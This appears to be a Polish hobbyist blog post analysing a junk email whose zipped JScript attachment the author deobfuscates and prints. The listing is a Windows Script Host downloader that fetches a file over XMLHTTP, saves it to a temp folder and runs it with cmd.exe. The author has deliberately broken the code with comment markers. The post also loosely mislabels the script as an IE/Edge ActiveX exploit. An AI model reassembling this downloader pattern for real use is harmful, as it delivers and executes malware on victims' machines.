Info o ciastkach

Eeee...
Żeby strona działała fajnie to trzeba zaakceptować obsługę pewnych plików. Jeśli jesteś nienormalny, nosisz czapkę z amelinium i siedzisz w schronie zbudowanym z poduszek to możesz je sobie wyłączyć. Autor strony nie czerpie żadnych korzyści z cookies (twierdzi nawet, że ten komunikat jest głupi), ale, cóż - Unia wymaga. Korzystając z witryny zgadzasz się z polityką cookies.

Wszystko w budowie...

Drobne porządki

Ostatnio przeglądałem sobie moją skrzynkę na WP. Tak z czystej ciekawości chciałem sprawdzić czy jeszcze dycha. Pośród spamu, reklam i niepotrzebnych subskrypcji odnalazlem maila bez tytułu. Treść wiadomości nie istaniała. Był natomiast załącznik. Pomyślałem sobie "hurra, jednak twórcy malware'u o mnie nie zapomnieli".

Ryc. 1. Niezwykle treściwy mail

Załącznik pobrałem i rozpakowałem a tam zapewne próba oszustwa na lewą fakturę ale coś zupełnie nie wyszło. Ba, nawet nie ma linków do zdalnej zawartości w treści. Coś się chyba rypło. Nazwa zewnętrznego archiwum to jakaś liczba i login do poczty. Wewnętrzny zip to "2017_ZIP.zip". A w środku siedzi zaciemniony plik JS "2017.js".

Ryc. 2. A to siedzi w środku

Na szczęście nie jest to zbyt zaciemnione. Całość po rozjaśnieniu tak wygląda



var orytyrzats1 = WScript[CreateObject](Scripting.FileSystemObject);

if (new Function(var pjipotpavqu = orytyrzatsl.GetDrive('C'); if(typeof pjipotpavqu.AvailableSpace == 'number') return true; else return false;)()){
	var jojnuhy0 = new Function(return ActiveXObject)();
	var rbyqpe = MSXML2.//XMLHTTP;
	var yctirr = Scripting.FileSystemObject;
	var size4 = WScript//.Shell;
	var ubiqt = ADODB.Stream;
	var ahwepwumxi = WScript[ScriptFullName];
	var ikupefus0 = new //jojnuhy0(rbyqpe);
	var njubzebf7 = new jojnuhy0(yctirr);
	//ikupefus0.open(GET,zusyx8, 0);
	//anfoho7[Open]();
	//var ypudahwez0 = njubzebf7[GetSpecialFolder](2)\\njubzebf7[GetTempName]();
	//anfoho7[Type] = 1;
	ikupefus0[send]();
	var cmilulycv = //new jojnuhy0(size4);
	var inpyw8 = cmd.exe /c //ypudahwez0;
	anfoho7[Position] = 0;
	if (ikupefus0[Status] == 200) {
		//anfoho7[Write](ikupefus0[ResponseBody]);
		//anfoho7[SaveToFile](ypudahwez0);
		//anfoho7[Close]();
		//cmilulycv[run](inpyw8, 0);
	}
}

Dzieci, nie próbujcie tego w domu (na wszelki wypadek dodałem co nieco od siebie).

Czyli kolejny exploit na ActiveX (czytaj MS Internet Explorer/Edge). Co to robi? Nie wiem gdyż tego nie uruchamiałem nigdzie. Wygląda jednak na to, że skrypt ma zdobyć uprawniena za sprawą błędu W IE/Edge, potem pobiera coś cięższego na dysk a następnie to uruchamia.

PS. Z innej bajki - ostatnio ktoś mi powiedział, że w pewnym punkcie obsługi mogą przerobić antenę 450 MHz na dowolną antenę LTE za sprawą adaptera SMA-TNC. A ja głupi wierzyłem fizyce.

Komentarze (0)

Nikt jeszcze nie dodał komentarza. Możesz być pierwszy.

Napisz komentarz lub zgłoś błąd

Dodane w dniu 24 kwietnia 2017 przez Michał Misztal
Kopiowanie powyższych wypocin dozwolone pod warunkiem podania źródła, znaczy tandemu autor + link do strony